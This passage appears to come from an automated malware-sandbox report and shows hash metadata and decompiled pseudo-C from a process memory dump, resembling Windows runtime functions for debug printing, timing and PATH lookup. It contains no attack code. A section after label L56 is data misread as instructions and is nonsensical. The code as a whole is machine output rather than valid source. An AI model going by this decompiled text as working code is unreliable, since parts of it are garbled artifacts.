                            • Opcode Fuzzy Hash: c40cf1454229e7a6edf3a602102d4984441c3ade941e2d2308bbca3aff8c8256
                            • Instruction Fuzzy Hash: 0C516F71E006199FDB15DFA8C840BAEBBFCFF44B48F24802DE649EB255D6719900CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E012EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                            				signed int _t65;
                            				signed short _t69;
                            				intOrPtr _t70;
                            				signed short _t85;
                            				void* _t86;
                            				signed short _t89;
                            				signed short _t91;
                            				intOrPtr _t92;
                            				intOrPtr _t97;
                            				intOrPtr* _t98;
                            				signed short _t99;
                            				signed short _t101;
                            				void* _t102;
                            				char* _t103;
                            				signed short _t104;
                            				intOrPtr* _t110;
                            				void* _t111;
                            				void* _t114;
                            				intOrPtr* _t115;
                            
                            				_t109 = __esi;
                            				_t108 = __edi;
                            				_t106 = __edx;
                            				_t95 = __ebx;
                            				_push(0x90);
                            				_push(0x13bf7a8);
                            				E0133D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                            				if(__edx == 0xffffffff) {
                            					L6:
                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                            					__eflags = _t65 & 0x00000002;
                            					if((_t65 & 0x00000002) != 0) {
                            						L3:
                            						L4:
                            						return E0133D130(_t95, _t108, _t109);
                            					}
                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                            					_t108 = 0;
                            					_t109 = 0;
                            					_t95 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						__eflags = _t95 - 0x200;
                            						if(_t95 >= 0x200) {
                            							break;
                            						}
                            						E0132D000(0x80);
                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                            						_t108 = _t115;
                            						_t95 = _t95 - 0xffffff80;
                            						_t17 = _t114 - 4;
                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                            						__eflags =  *_t17;
                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                            						_t102 = _t110 + 1;
                            						do {
                            							_t85 =  *_t110;
                            							_t110 = _t110 + 1;
                            							__eflags = _t85;
                            						} while (_t85 != 0);
                            						_t111 = _t110 - _t102;
                            						_t21 = _t95 - 1; // -129
                            						_t86 = _t21;
                            						__eflags = _t111 - _t86;
                            						if(_t111 > _t86) {
                            							_t111 = _t86;
                            						}
                            						E0132F3E0(_t108, _t106, _t111);
                            						_t115 = _t115 + 0xc;
                            						_t103 = _t111 + _t108;
                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                            						_t89 = _t95 - _t111;
                            						__eflags = _t89;
                            						_push(0);
                            						if(_t89 == 0) {
                            							L15:
                            							_t109 = 0xc000000d;
                            							goto L16;
                            						} else {
                            							__eflags = _t89 - 0x7fffffff;
                            							if(_t89 <= 0x7fffffff) {
                            								L16:
                            								 *(_t114 - 0x94) = _t109;
                            								__eflags = _t109;
                            								if(_t109 < 0) {
                            									__eflags = _t89;
                            									if(_t89 != 0) {
                            										 *_t103 = 0;
                            									}
                            									L26:
                            									 *(_t114 - 0xa0) = _t109;
                            									 *(_t114 - 4) = 0xfffffffe;
                            									__eflags = _t109;
                            									if(_t109 >= 0) {
                            										L31:
                            										_t98 = _t108;
                            										_t39 = _t98 + 1; // 0x1
                            										_t106 = _t39;
                            										do {
                            											_t69 =  *_t98;
                            											_t98 = _t98 + 1;
                            											__eflags = _t69;
                            										} while (_t69 != 0);
                            										_t99 = _t98 - _t106;
                            										__eflags = _t99;
                            										L34:
                            										_t70 =  *[fs:0x30];
                            										__eflags =  *((char*)(_t70 + 2));
                            										if( *((char*)(_t70 + 2)) != 0) {
                            											L40:
                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                            											 *(_t114 - 4) = 1;
                            											_push(_t114 - 0x74);
                            											L0133DEF0(_t99, _t106);
                            											 *(_t114 - 4) = 0xfffffffe;
                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            											goto L3;
                            										}
                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                            											goto L40;
                            										}
                            										_push( *((intOrPtr*)(_t114 + 8)));
                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                            										_push(_t99 & 0x0000ffff);
                            										_push(_t108);
                            										_push(1);
                            										_t101 = E0132B280();
                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                            										if( *((char*)(_t114 + 0x14)) == 1) {
                            											__eflags = _t101 - 0x80000003;
                            											if(_t101 == 0x80000003) {
                            												E0132B7E0(1);
                            												_t101 = 0;
                            												__eflags = 0;
                            											}
                            										}
                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                            										goto L4;
                            									}
                            									__eflags = _t109 - 0x80000005;
                            									if(_t109 == 0x80000005) {
                            										continue;
                            									}
                            									break;
                            								}
                            								 *(_t114 - 0x90) = 0;
                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                            								_t91 = E0132E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                            								_t115 = _t115 + 0x10;
                            								_t104 = _t91;
                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                            								__eflags = _t104;
                            								if(_t104 < 0) {
                            									L21:
                            									_t109 = 0x80000005;
                            									 *(_t114 - 0x90) = 0x80000005;
                            									L22:
                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                            									L23:
                            									 *(_t114 - 0x94) = _t109;
                            									goto L26;
                            								}
                            								__eflags = _t104 - _t92;
                            								if(__eflags > 0) {
                            									goto L21;
                            								}
                            								if(__eflags == 0) {
                            									goto L22;
                            								}
                            								goto L23;
                            							}
                            							goto L15;
                            						}
                            					}
                            					__eflags = _t109;
                            					if(_t109 >= 0) {
                            						goto L31;
                            					}
                            					__eflags = _t109 - 0x80000005;
                            					if(_t109 != 0x80000005) {
                            						goto L31;
                            					}
                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                            					_t38 = _t95 - 1; // -129
                            					_t99 = _t38;
                            					goto L34;
                            				}
                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                            					__eflags = __edx - 0x65;
                            					if(__edx != 0x65) {
                            						goto L2;
                            					}
                            					goto L6;
                            				}
                            				L2:
                            				_push( *((intOrPtr*)(_t114 + 8)));
                            				_push(_t106);
                            				if(E0132A890() != 0) {
                            					goto L6;
                            				}
                            				goto L3;
                            			}























                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: _vswprintf_s
                            • String ID:
                            • API String ID: 677850445-0
                            • Opcode ID: 2d8d2d28c0a0e5c664ef36d13198c1373114e57195b7c8f5a7ee3de147aad735
                            • Instruction ID: dbee48c04ec744d61646572c1d48aa9f4e4550489777b826f1dc9adf826b8a52
                            • Opcode Fuzzy Hash: 2d8d2d28c0a0e5c664ef36d13198c1373114e57195b7c8f5a7ee3de147aad735
                            • Instruction Fuzzy Hash: 8151E075D0026A8BEB31CF68C845BAEBFF0BF00718F2041B9D859AB282D7716941DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0130B944(signed int* __ecx, char __edx) {
                            				signed int _v8;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				signed int* _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				char _v77;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t65;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				char* _t73;
                            				intOrPtr _t77;
                            				intOrPtr _t78;
                            				signed int _t82;
                            				intOrPtr _t83;
                            				void* _t87;
                            				char _t88;
                            				intOrPtr* _t89;
                            				intOrPtr _t91;
                            				void* _t97;
                            				intOrPtr _t100;
                            				void* _t102;
                            				void* _t107;
                            				signed int _t108;
                            				intOrPtr* _t112;
                            				void* _t113;
                            				intOrPtr* _t114;
                            				intOrPtr _t115;
                            				intOrPtr _t116;
                            				intOrPtr _t117;
                            				signed int _t118;
                            				void* _t130;
                            
                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                            				_v8 =  *0x13dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                            				_t112 = __ecx;
                            				_v77 = __edx;
                            				_v48 = __ecx;
                            				_v28 = 0;
                            				_t5 = _t112 + 0xc; // 0x575651ff
                            				_t105 =  *_t5;
                            				_v20 = 0;
                            				_v16 = 0;
                            				if(_t105 == 0) {
                            					_t50 = _t112 + 4; // 0x5de58b5b
                            					_t60 =  *__ecx |  *_t50;
                            					if(( *__ecx |  *_t50) != 0) {
                            						 *__ecx = 0;
                            						__ecx[1] = 0;
                            						if(E01307D50() != 0) {
                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t65 = 0x7ffe0386;
                            						}
                            						if( *_t65 != 0) {
                            							E013B8CD6(_t112);
                            						}
                            						_push(0);
                            						_t52 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t52);
                            						_t60 = E01329E20();
                            					}
                            					L20:
                            					_pop(_t107);
                            					_pop(_t113);
                            					_pop(_t87);
                            					return E0132B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                            				}
                            				_t8 = _t112 + 8; // 0x8b000cc2
                            				_t67 =  *_t8;
                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                            				_t108 =  *(_t67 + 0x14);
                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                            				_t105 = 0x2710;
                            				asm("sbb eax, edi");
                            				_v44 = _t88;
                            				_v52 = _t108;
                            				_t60 = E0132CE00(_t97, _t68, 0x2710, 0);
                            				_v56 = _t60;
                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                            					L3:
                            					 *(_t112 + 0x44) = _t60;
                            					_t105 = _t60 * 0x2710 >> 0x20;
                            					 *_t112 = _t88;
                            					 *(_t112 + 4) = _t108;
                            					_v20 = _t60 * 0x2710;
                            					_v16 = _t60 * 0x2710 >> 0x20;
                            					if(_v77 != 0) {
                            						L16:
                            						_v36 = _t88;
                            						_v32 = _t108;
                            						if(E01307D50() != 0) {
                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t73 = 0x7ffe0386;
                            						}
                            						if( *_t73 != 0) {
                            							_t105 = _v40;
                            							E013B8F6A(_t112, _v40, _t88, _t108);
                            						}
                            						_push( &_v28);
                            						_push(0);
                            						_push( &_v36);
                            						_t48 = _t112 + 0x10; // 0x778df98b
                            						_push( *_t48);
                            						_t60 = E0132AF60();
                            						goto L20;
                            					} else {
                            						_t89 = 0x7ffe03b0;
                            						do {
                            							_t114 = 0x7ffe0010;
                            							do {
                            								_t77 =  *0x13d8628; // 0x0
                            								_v68 = _t77;
                            								_t78 =  *0x13d862c; // 0x0
                            								_v64 = _t78;
                            								_v72 =  *_t89;
                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                            								while(1) {
                            									_t105 =  *0x7ffe000c;
                            									_t100 =  *0x7ffe0008;
                            									if(_t105 ==  *_t114) {
                            										goto L8;
                            									}
                            									asm("pause");
                            								}
                            								L8:
                            								_t89 = 0x7ffe03b0;
                            								_t115 =  *0x7ffe03b0;
                            								_t82 =  *0x7FFE03B4;
                            								_v60 = _t115;
                            								_t114 = 0x7ffe0010;
                            								_v56 = _t82;
                            							} while (_v72 != _t115 || _v76 != _t82);
                            							_t83 =  *0x13d8628; // 0x0
                            							_t116 =  *0x13d862c; // 0x0
                            							_v76 = _t116;
                            							_t117 = _v68;
                            						} while (_t117 != _t83 || _v64 != _v76);
                            						asm("sbb edx, [esp+0x24]");
                            						_t102 = _t100 - _v60 - _t117;
                            						_t112 = _v48;
                            						_t91 = _v44;
                            						asm("sbb edx, eax");
                            						_t130 = _t105 - _v52;
                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                            							_t88 = _t102 - _t91;
                            							asm("sbb edx, edi");
                            							_t108 = _t105;
                            						} else {
                            							_t88 = 0;
                            							_t108 = 0;
                            						}
                            						goto L16;
                            					}
                            				} else {
                            					if( *(_t112 + 0x44) == _t60) {
                            						goto L20;
                            					}
                            					goto L3;
                            				}
                            			}

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0130B9A5
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 885266447-0
                            • Opcode ID: ae4e49f2bd1ea4ade9b1ff1f714096d79ff775076e5de16ac8bf4da8bc86afb4
                            • Instruction ID: 3871854608767c04f2a660750fc53df72db5e0c6a12cb77f1eda825b1ce007cd
                            • Opcode Fuzzy Hash: ae4e49f2bd1ea4ade9b1ff1f714096d79ff775076e5de16ac8bf4da8bc86afb4
                            • Instruction Fuzzy Hash: E2516B75608341CFD722DF6DC090A2AFBE9FB88718F14496EE69587789D730E844CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E01312581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912045) {
                            				signed int _v8;
                            				signed int _v16;
                            				unsigned int _v24;
                            				void* _v28;
                            				signed int _v32;
                            				unsigned int _v36;
                            				signed int _v37;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _t233;
                            				signed int _t237;
                            				signed int _t238;
                            				signed int _t239;
                            				signed int _t243;
                            				signed int _t245;
                            				intOrPtr _t247;
                            				signed int _t250;
                            				signed int _t257;
                            				signed int _t260;
                            				signed int _t268;
                            				intOrPtr _t274;
                            				signed int _t276;
                            				signed int _t278;
                            				void* _t279;
                            				signed int _t280;
                            				unsigned int _t283;
                            				signed int _t287;
                            				signed int* _t288;
                            				signed int _t289;
                            				signed int _t293;
                            				intOrPtr _t305;
                            				signed int _t314;
                            				signed int _t316;
                            				signed int _t317;
                            				signed int _t321;
                            				signed int _t322;
                            				void* _t324;
                            				signed int _t325;
                            				signed int _t327;
                            				signed int _t330;
                            				void* _t331;
                            
                            				_t327 = _t330;
                            				_t331 = _t330 - 0x4c;
                            				_v8 =  *0x13dd360 ^ _t327;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_t321 = 0x13db2e8;
                            				_v56 = _a4;
                            				_v48 = __edx;
                            				_v60 = __ecx;
                            				_t283 = 0;
                            				_v80 = 0;
                            				asm("movsd");
                            				_v64 = 0;
                            				_v76 = 0;
                            				_v72 = 0;
                            				asm("movsd");
                            				_v44 = 0;
                            				_v52 = 0;
                            				_v68 = 0;
                            				asm("movsd");
                            				_v32 = 0;
                            				_v36 = 0;
                            				asm("movsd");
                            				_v16 = 0;
                            				_t274 = 0x48;
                            				_t303 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                            				_t314 = 0;
                            				_v37 = _t303;
                            				if(_v48 <= 0) {
                            					L16:
                            					_t45 = _t274 - 0x48; // 0x0
                            					__eflags = _t45 - 0xfffe;
                            					if(_t45 > 0xfffe) {
                            						_t322 = 0xc0000106;
                            						goto L32;
                            					} else {
                            						_t321 = L01304620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                            						_v52 = _t321;
                            						__eflags = _t321;
                            						if(_t321 == 0) {
                            							_t322 = 0xc0000017;
                            							goto L32;
                            						} else {
                            							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
                            							_t50 = _t321 + 0x48; // 0x48
                            							_t316 = _t50;
                            							_t303 = _v32;
                            							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
                            							_t276 = 0;
                            							 *((short*)(_t321 + 0x30)) = _v48;
                            							__eflags = _t303;
                            							if(_t303 != 0) {
                            								 *(_t321 + 0x18) = _t316;
                            								__eflags = _t303 - 0x13d8478;
                            								 *_t321 = ((0 | _t303 == 0x013d8478) - 0x00000001 & 0xfffffffb) + 7;
                            								E0132F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                            								_t303 = _v32;
                            								_t331 = _t331 + 0xc;
                            								_t276 = 1;
                            								__eflags = _a8;
                            								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
                            								if(_a8 != 0) {
                            									_t268 = E013739F2(_t316);
                            									_t303 = _v32;
                            									_t316 = _t268;
                            								}
                            							}
                            							_t287 = 0;
                            							_v16 = 0;
                            							__eflags = _v48;
                            							if(_v48 <= 0) {
                            								L31:
                            								_t322 = _v68;
                            								__eflags = 0;
                            								 *((short*)(_t316 - 2)) = 0;
                            								goto L32;
                            							} else {
                            								_t278 = _t321 + _t276 * 4;
                            								_v56 = _t278;
                            								do {
                            									__eflags = _t303;
                            									if(_t303 != 0) {
                            										_t233 =  *(_v60 + _t287 * 4);
                            										__eflags = _t233;
                            										if(_t233 == 0) {
                            											goto L30;
                            										} else {
                            											__eflags = _t233 == 5;
                            											if(_t233 == 5) {
                            												goto L30;
                            											} else {
                            												goto L22;
                            											}
                            										}
                            									} else {
                            										L22:
                            										 *_t278 =  *(_v60 + _t287 * 4);
                            										 *(_t278 + 0x18) = _t316;
                            										_t237 =  *(_v60 + _t287 * 4);
                            										__eflags = _t237 - 8;
                            										if(_t237 > 8) {
                            											goto L56;
                            										} else {
                            											switch( *((intOrPtr*)(_t237 * 4 +  &M01312959))) {
                            												case 0:
                            													__ax =  *0x13d8488;
                            													__eflags = __ax;
                            													if(__ax == 0) {
                            														goto L29;
                            													} else {
                            														__ax & 0x0000ffff = E0132F3E0(__edi,  *0x13d848c, __ax & 0x0000ffff);
                            														__eax =  *0x13d8488 & 0x0000ffff;
                            														goto L26;
                            													}
                            													goto L108;
                            												case 1:
                            													L45:
                            													E0132F3E0(_t316, _v80, _v64);
                            													_t263 = _v64;
                            													goto L26;
                            												case 2:
                            													 *0x13d8480 & 0x0000ffff = E0132F3E0(__edi,  *0x13d8484,  *0x13d8480 & 0x0000ffff);
                            													__eax =  *0x13d8480 & 0x0000ffff;
                            													__eax = ( *0x13d8480 & 0x0000ffff) >> 1;
                            													__edi = __edi + __eax * 2;
                            													goto L28;
                            												case 3:
                            													__eax = _v44;
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														goto L29;
                            													} else {
                            														__esi = __eax + __eax;
                            														__eax = E0132F3E0(__edi, _v72, __esi);
                            														__edi = __edi + __esi;
                            														__esi = _v52;
                            														goto L27;
                            													}
                            													goto L108;
                            												case 4:
                            													_push(0x2e);
                            													_pop(__eax);
                            													 *(__esi + 0x44) = __edi;
                            													 *__edi = __ax;
                            													__edi = __edi + 4;
                            													_push(0x3b);
                            													_pop(__eax);
                            													 *(__edi - 2) = __ax;
                            													goto L29;
                            												case 5:
                            													__eflags = _v36;
                            													if(_v36 == 0) {
                            														goto L45;
                            													} else {
                            														E0132F3E0(_t316, _v76, _v36);
                            														_t263 = _v36;
                            													}
                            													L26:
                            													_t331 = _t331 + 0xc;
                            													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
                            													__eflags = _t316;
                            													L27:
                            													_push(0x3b);
                            													_pop(_t265);
                            													 *((short*)(_t316 - 2)) = _t265;
                            													goto L28;
                            												case 6:
                            													__ebx =  *0x13d575c;
                            													__eflags = __ebx - 0x13d575c;
                            													if(__ebx != 0x13d575c) {
                            														_push(0x3b);
                            														_pop(__esi);
                            														do {
                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                            															E0132F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                            															__edi = __edi + __eax * 2;
                            															__edi = __edi + 2;
                            															 *(__edi - 2) = __si;
                            															__ebx =  *__ebx;
                            															__eflags = __ebx - 0x13d575c;
                            														} while (__ebx != 0x13d575c);
                            														__esi = _v52;
                            														__ecx = _v16;
                            														__edx = _v32;
                            													}
                            													__ebx = _v56;
                            													goto L29;
                            												case 7:
                            													 *0x13d8478 & 0x0000ffff = E0132F3E0(__edi,  *0x13d847c,  *0x13d8478 & 0x0000ffff);
                            													__eax =  *0x13d8478 & 0x0000ffff;
                            													__eax = ( *0x13d8478 & 0x0000ffff) >> 1;
                            													__eflags = _a8;
                            													__edi = __edi + __eax * 2;
                            													if(_a8 != 0) {
                            														__ecx = __edi;
                            														__eax = E013739F2(__ecx);
                            														__edi = __eax;
                            													}
                            													goto L28;
                            												case 8:
                            													__eax = 0;
                            													 *(__edi - 2) = __ax;
                            													 *0x13d6e58 & 0x0000ffff = E0132F3E0(__edi,  *0x13d6e5c,  *0x13d6e58 & 0x0000ffff);
                            													 *(__esi + 0x38) = __edi;
                            													__eax =  *0x13d6e58 & 0x0000ffff;
                            													__eax = ( *0x13d6e58 & 0x0000ffff) >> 1;
                            													__edi = __edi + __eax * 2;
                            													__edi = __edi + 2;
                            													L28:
                            													_t287 = _v16;
                            													_t303 = _v32;
                            													L29:
                            													_t278 = _t278 + 4;
                            													__eflags = _t278;
                            													_v56 = _t278;
                            													goto L30;
                            											}
                            										}
                            									}
                            									goto L108;
                            									L30:
                            									_t287 = _t287 + 1;
                            									_v16 = _t287;
                            									__eflags = _t287 - _v48;
                            								} while (_t287 < _v48);
                            								goto L31;
                            							}
                            						}
                            					}
                            				} else {
                            					while(1) {
                            						L1:
                            						_t237 =  *(_v60 + _t314 * 4);
                            						if(_t237 > 8) {
                            							break;
                            						}
                            						switch( *((intOrPtr*)(_t237 * 4 +  &M01312935))) {
                            							case 0:
                            								__ax =  *0x13d8488;
                            								__eflags = __ax;
                            								if(__ax != 0) {
                            									__eax = __ax & 0x0000ffff;
                            									__ebx = __ebx + 2;
                            									__eflags = __ebx;
                            									goto L53;
                            								}
                            								goto L14;
                            							case 1:
                            								L44:
                            								_t303 =  &_v64;
                            								_v80 = E01312E3E(0,  &_v64);
                            								_t274 = _t274 + _v64 + 2;
                            								goto L13;
                            							case 2:
                            								__eax =  *0x13d8480 & 0x0000ffff;
                            								__ebx = __ebx + __eax;
                            								__eflags = __dl;
                            								if(__dl != 0) {
                            									__eax = 0x13d8480;
                            									goto L80;
                            								}
                            								goto L14;
                            							case 3:
                            								__eax = E012FEEF0(0x13d79a0);
                            								__eax =  &_v44;
                            								_push(__eax);
                            								_push(0);
                            								_push(0);
                            								_push(4);
                            								_push(L"PATH");
                            								_push(0);
                            								L57();
                            								__esi = __eax;
                            								_v68 = __esi;
                            								__eflags = __esi - 0xc0000023;
                            								if(__esi != 0xc0000023) {
                            									L10:
                            									__eax = E012FEB70(__ecx, 0x13d79a0);
                            									__eflags = __esi - 0xc0000100;
                            									if(__esi == 0xc0000100) {
                            										_v44 = _v44 & 0x00000000;
                            										__eax = 0;
                            										_v68 = 0;
                            										goto L13;
                            									} else {
                            										__eflags = __esi;
                            										if(__esi < 0) {
                            											L32:
                            											_t211 = _v72;
                            											__eflags = _t211;
                            											if(_t211 != 0) {
                            												L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                            											}
                            											_t212 = _v52;
                            											__eflags = _t212;
                            											if(_t212 != 0) {
                            												__eflags = _t322;
                            												if(_t322 < 0) {
                            													L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                            													_t212 = 0;
                            												}
                            											}
                            											goto L36;
                            										} else {
                            											__eax = _v44;
                            											__ebx = __ebx + __eax * 2;
                            											__ebx = __ebx + 2;
                            											__eflags = __ebx;
                            											L13:
                            											_t283 = _v36;
                            											goto L14;
                            										}
                            									}
                            								} else {
                            									__eax = _v44;
                            									__ecx =  *0x13d7b9c; // 0x0
                            									_v44 + _v44 =  *[fs:0x30];
                            									__ecx = __ecx + 0x180000;
                            									__eax = L01304620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                            									_v72 = __eax;
                            									__eflags = __eax;
                            									if(__eax == 0) {
                            										__eax = E012FEB70(__ecx, 0x13d79a0);
                            										__eax = _v52;
                            										L36:
                            										_pop(_t315);
                            										_pop(_t323);
                            										__eflags = _v8 ^ _t327;
                            										_pop(_t275);
                            										return E0132B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
                            									} else {
                            										__ecx =  &_v44;
                            										_push(__ecx);
                            										_push(_v44);
                            										_push(__eax);
                            										_push(4);
                            										_push(L"PATH");
                            										_push(0);
                            										L57();
                            										__esi = __eax;
                            										_v68 = __eax;
                            										goto L10;
                            									}
                            								}
                            								goto L108;
                            							case 4:
                            								__ebx = __ebx + 4;
                            								goto L14;
                            							case 5:
                            								_t270 = _v56;
                            								if(_v56 != 0) {
                            									_t303 =  &_v36;
                            									_t272 = E01312E3E(_t270,  &_v36);
                            									_t283 = _v36;
                            									_v76 = _t272;
                            								}
                            								if(_t283 == 0) {
                            									goto L44;
                            								} else {
                            									_t274 = _t274 + 2 + _t283;
                            								}
                            								goto L14;
                            							case 6:
                            								__eax =  *0x13d5764 & 0x0000ffff;
                            								goto L53;
                            							case 7:
                            								__eax =  *0x13d8478 & 0x0000ffff;
                            								__ebx = __ebx + __eax;
                            								__eflags = _a8;
                            								if(_a8 != 0) {
                            									__ebx = __ebx + 0x16;
                            									__ebx = __ebx + __eax;
                            								}
                            								__eflags = __dl;
                            								if(__dl != 0) {
                            									__eax = 0x13d8478;
                            									L80:
                            									_v32 = __eax;
                            								}
                            								goto L14;
                            							case 8:
                            								__eax =  *0x13d6e58 & 0x0000ffff;
                            								__eax = ( *0x13d6e58 & 0x0000ffff) + 2;
                            								L53:
                            								__ebx = __ebx + __eax;
                            								L14:
                            								_t314 = _t314 + 1;
                            								if(_t314 >= _v48) {
                            									goto L16;
                            								} else {
                            									_t303 = _v37;
                            									goto L1;
                            								}
                            								goto L108;
                            						}
                            					}
                            					L56:
                            					_t288 = 0x25;
                            					asm("int 0x29");
                            					asm("out 0x28, al");
                            					 *_t288 =  *_t288 ^ _t237;
                            					asm("o16 sub [ecx], dh");
                            					_t238 = _t237 + _t331;
                            					asm("daa");
                            					 *_t288 =  *_t288 ^ _t238;
                            					 *[es:ecx] =  *[es:ecx] ^ _t238;
                            					_t324 = _t321 + 1;
                            					 *_t288 =  *_t288 - _t303;
                            					 *0x1f013126 =  *0x1f013126 + _t238;
                            					_pop(_t279);
                            					_t239 = _t238 ^ 0x31289401;
                            					 *0x201355b =  *0x201355b + _t324;
                            					 *_t288 =  *_t288 - _t324;
                            					 *((intOrPtr*)(_t239 - 0x9feced8)) =  *((intOrPtr*)(_t239 - 0x9feced8)) + _t239;
                            					asm("daa");
                            					 *_t288 =  *_t288 ^ _t239;
                            					_push(ds);
                            					 *_t288 =  *_t288 - _t303;
                            					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
                            					 *_t288 =  *_t288 ^ _t239;
                            					asm("daa");
                            					 *_t288 =  *_t288 ^ _t239;
                            					asm("fcomp dword [ebx+0x35]");
                            					 *((intOrPtr*)(_t239 +  &_a1546912045)) =  *((intOrPtr*)(_t239 +  &_a1546912045)) + _t324;
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					_push(0x20);
                            					_push(0x13bff00);
                            					E0133D08C(_t279, _t316, _t324);
                            					_v44 =  *[fs:0x18];
                            					_t317 = 0;
                            					 *_a24 = 0;
                            					_t280 = _a12;
                            					__eflags = _t280;
                            					if(_t280 == 0) {
                            						_t243 = 0xc0000100;
